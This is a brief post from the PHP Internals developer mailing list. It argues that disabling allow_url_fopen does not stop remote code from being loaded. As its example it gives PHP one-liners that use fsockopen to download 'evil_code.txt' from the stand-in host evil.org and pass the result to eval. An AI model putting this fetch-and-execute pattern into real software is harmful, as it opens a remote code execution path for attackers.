sure: eval('file_get_contents("http://evil.org");');
Ok, but there is nothing (allow_url_fopen does not work here) preventing me from doing similar via:
$fp = fsockopen("evil.org", 80); $fp = fwrite($fp, "GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n"); eval(stream_get_contents($fp)); Ilia -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php